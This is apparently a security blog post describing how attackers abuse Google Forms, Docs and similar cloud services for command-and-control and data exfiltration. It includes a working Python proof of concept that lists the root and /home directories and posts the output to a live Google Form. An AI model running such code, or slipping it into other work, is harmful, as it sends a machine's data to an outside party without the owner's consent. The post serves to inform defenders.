Does that traffic to commercial public cloud services and web-based applications seem legitimate to you? Bad actors are abusing the shit out of cloud services: Google Docs, Google Forms, Discord, and others, concealing their badness in TLS and the reputation of big cloud brands. This post is an ongoing notebook on both found abuses of these services and proofs-of-concept to show how they might be abused, as Gogol’s Chichikov abused Tsarist census patterns and plans for big land giveaways, buying “dead souls” from serf-owning provincial nobility to fake legitimacy and get big real estate gains.
OK, this is a stretch of a metaphor, but let me run with it.
First, let us take the example of Google Docs. It costs nothing to set up a Google Docs infrastructuer, either in design skill or financial outlay. Using throwaway credentials (soon-to-be dead cloud souls), a bad actor can create data stores, forms, and other bits of C2 that can be abandoned before Google slaps them with a TOS violation ban.
Google Forms is increasingly abused as a phishing tool for the most gullible. But because it is essentially a web interface to Google Sheets, it can be used as an exfiltration channel for data and as part of a command and control system for malware. Take, for example, the following sample of Python code (in this case, to be run on a Linux box):
import requests, os, sys, subprocess
result1 = subprocess.run("ls", cwd="/", stdout=subprocess.PIPE)
result2 = subprocess.run("ls", cwd="/home", stdout=subprocess.PIPE)
url = 'https://docs.google.com/forms/d/e/1FAIpQLSf11PfDQk90dPdP_54GiFiu2HuH8yHx6rwg6z5pMqnVu24ozw/formResponse'
exfil = {'entry.1313127478': result1, 'entry.301035952' : result2, 'entry.1656783446' : 'YourMom', 'pageHistory' : 0 , 'fbzx' : 6986343948646835646}
x = requests.post(url, data = exfil)
print(x.text)
If you run this code, it will send the contents of the root directory and /home directory to a web form I’ve created, which will add it as a line to a Google Sheet corresponding to the form results.
Fancy Bear Friends 